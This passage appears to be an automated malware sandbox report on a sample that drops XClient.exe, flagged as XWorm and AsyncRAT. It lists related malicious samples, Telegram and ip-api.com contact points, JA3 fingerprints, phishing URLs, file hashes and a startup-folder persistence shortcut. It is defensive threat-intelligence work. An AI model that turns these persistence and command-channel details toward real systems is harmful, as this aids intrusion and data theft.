                                        file.exeGet hashmaliciousUnknownBrowse
                                          file.exeGet hashmaliciousUnknownBrowse
                                            file.exeGet hashmaliciousUnknownBrowse
                                              LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
                                                LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                                                  New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                    147.185.221.21sv6ieteV0j.exeGet hashmaliciousNjrat, PureLog StealerBrowse
                                                      setup.exeGet hashmaliciousRedLineBrowse
                                                        setup.exeGet hashmaliciousRedLineBrowse
                                                          47up6MR64o.exeGet hashmaliciousNjratBrowse
                                                            RdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                              python.exeGet hashmaliciousXWormBrowse
                                                                setup.exeGet hashmaliciousXWormBrowse
                                                                  Avowed Beta.exeGet hashmaliciousXWormBrowse
                                                                    nebula.exeGet hashmaliciousXWormBrowse
                                                                      Server.exeGet hashmaliciousNjratBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        ip-api.comCTIPUPiILj.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 208.95.112.1
                                                                        Built.exeGet hashmaliciousBlank GrabberBrowse
                                                                        • 208.95.112.1
                                                                        JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_1.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_147.exeGet hashmaliciousBlank GrabberBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_368.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_473.exeGet hashmaliciousNjrat, XWormBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_473.exeGet hashmaliciousNjrat, XWormBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_52.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002B_109.exeGet hashmaliciousBlackshadesBrowse
                                                                        • 208.95.112.1
                                                                        api.telegram.orgzx.ps1Get hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        LisectAVT_2403002A_127.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 149.154.167.220
                                                                        LisectAVT_2403002A_74.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 149.154.167.220
                                                                        New Order.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        TELEGRAMRUzx.ps1Get hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        1lKbb2hF7fYToopfpmEvlyRN.exeGet hashmaliciousLummaC, VidarBrowse
                                                                        • 149.154.167.99
                                                                        new order 00041221.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        7NeoZ6OBn2.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        fps-booster.exeGet hashmaliciousStormKittyBrowse
                                                                        • 149.154.167.99
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        http://jolly-figolla-4c9551.netlify.app/Get hashmaliciousUnknownBrowse
                                                                        • 149.154.167.99
                                                                        TUT-ASUSCTIPUPiILj.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 208.95.112.1
                                                                        Built.exeGet hashmaliciousBlank GrabberBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_1.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_147.exeGet hashmaliciousBlank GrabberBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_368.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_473.exeGet hashmaliciousNjrat, XWormBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_473.exeGet hashmaliciousNjrat, XWormBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002A_52.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002B_109.exeGet hashmaliciousBlackshadesBrowse
                                                                        • 208.95.112.1
                                                                        LisectAVT_2403002B_253.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        SALSGIVERUSCTIPUPiILj.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                        • 147.185.221.20
                                                                        LisectAVT_2403002A_135.exeGet hashmaliciousNjratBrowse
                                                                        • 147.185.221.19
                                                                        LisectAVT_2403002B_484.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                        • 147.185.221.19
                                                                        LisectAVT_2403002B_484.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                        • 147.185.221.19
                                                                        LisectAVT_2403002C_149.exeGet hashmaliciousAsyncRATBrowse
                                                                        • 147.185.221.18
                                                                        LisectAVT_2403002C_28.exeGet hashmaliciousRemcosBrowse
                                                                        • 147.185.221.18
                                                                        sv6ieteV0j.exeGet hashmaliciousNjrat, PureLog StealerBrowse
                                                                        • 147.185.221.21
                                                                        Ym4vc47pgk.elfGet hashmaliciousUnknownBrowse
                                                                        • 147.184.134.179
                                                                        Windows Defender.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.20
                                                                        setup.exeGet hashmaliciousRedLineBrowse
                                                                        • 147.185.221.21

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0ezx.ps1Get hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        https://b8le2c5j.r.us-east-2.awstrack.me/L0/https:%2F%2Fslivtovara.ru%2Fbitrix%2Fredirect.php%3Fevent1=click_to_call%26event2=%26event3=%26goto=https:%2F%2F7qrw.wanianten.com%2FGhGNAL8%2F%23Pamy@derick.com/1/010f0190ec251e7b-a039cc69-e4b5-46b3-9c67-bbe921a600f9-000000/LLZuw2OBV0eOHt3bnXuAzTOkJoc=169Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                        • 149.154.167.220
                                                                        https://alamanaschool-my.sharepoint.com/:o:/g/personal/faridhajahan_kg_amanaschool_com/EjJ3Pc0GI4lCgL5xS_fmQD0Bn9XR0VtN5_yNafsBQyYJsg?e=OHPWmQGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                        • 149.154.167.220
                                                                        SecuriteInfo.com.Win32.MalwareX-gen.31904.27419.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 149.154.167.220
                                                                        https://fiffr-12d16.web.appGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        Swift Copy.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 149.154.167.220
                                                                        https://pendingdelivery864.s3.us-east.cloud-object-storage.appdomain.cloud/%2540%2523%2524%2525%255E%2526%2526()(%2526%2526%255E%255E%2525%2525%2524%2524%2524%2523%2523.html#nogueira@carboclor.com.arGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        6SoKuOqyNh.exeGet hashmaliciousAmadey, Babadeda, Stealc, VidarBrowse
                                                                        • 149.154.167.220
                                                                        Payment Advice__HSBC Banking.pdf.lnkGet hashmaliciousRemcosBrowse
                                                                        • 149.154.167.220

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:@...e...........................................................

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3215xsqh.mxa.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kwlubfa.w5b.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ytiqaum.omr.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aid3g2mq.pct.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d345c211.kro.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlgqxa3z.dyl.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duyaet4y.crj.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipue5a15.5xd.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jg04wn2l.bb1.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lwtwgnmw.dty.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxmi3xvi.024.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmp4obgy.ppb.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phc1oh5n.rii.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmsodh11.axw.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv1su0mt.5wj.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbufjtze.jhr.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\VJV2AjJ7Na.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Jul 26 18:22:53 2024, mtime=Fri Jul 26 18:22:53 2024, atime=Fri Jul 26 18:22:53 2024, length=71168, window=hide
                                                                        Category:modified
                                                                        Size (bytes):767
                                                                        Entropy (8bit):5.016504242302474
                                                                        Encrypted:false
                                                                        SSDEEP:12:8nwcwca24Qop0pnu8ChRlXIsY//l5lESLtqYslLjATE+HkLbCJcdmV:8wZvncDolXUdFcYEATEFLbC+dm
                                                                        MD5:61F1AA6BE069FFF4F47959E53D45B7AE
                                                                        SHA1:5F6E79C111584006C905048001CB618CE6EF8064
                                                                        SHA-256:4C39C92D6F43308E4E70B5CFD976CF755C67F7D9A24FF27BA9135E93DBE66885
                                                                        SHA-512:8442A839CD536AFFC5B3D71269AFA36778B169A5DDACBE03E5D9B8AD4BFCB6DF8F0CF39A51B24DE73448C954478DA41BCEFE9F84DABE75B41761BE35CA6C9948
                                                                        Malicious:false
                                                                        Preview:L..................F.... ...4.16....4.16....4.16............................v.:..DG..Yr?.D..U..k0.&...&.......$..S...........2.66........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.X.............................^.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......EW<2.X....../.......................H.R.o.a.m.i.n.g.....b.2......X. .XClient.exe.H.......X..X.....)......................e.X.C.l.i.e.n.t...e.x.e.......\...............-.......[..................C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......965969...........hT..CrF.f4... ..mDr.K...-...-$..hT..CrF.f4... ..mDr.K...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                        C:\Users\user\AppData\Roaming\XClient.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\VJV2AjJ7Na.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):71168
                                                                        Entropy (8bit):5.928240316671683
                                                                        Encrypted:false
                                                                        SSDEEP:1536:/Jyq1zgbszio2koAZnsuW8sLFbsnkRs6v6daV4IO8geup:/JT1zPziqoQsX8sLFbsH6R4IO8geup
                                                                        MD5:99088D7D8B409B4039B02295E64A686F
                                                                        SHA1:F58DAD3090854F8AB5CC3DE89D6CDAEB151883D4
                                                                        SHA-256:A9F1D82A7954D86D746086969C0D7B7B5CA65CCFD0D6A375931A6826ECA1A8C7
                                                                        SHA-512:A485B749F096A63BCC733B848317CECA918EE46516BCF17593C8358303A80AA0FB15C99B444FBEAC02F79AC69C165E8A2FBB614265A56D99B5C098BD48D388B7
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 79%
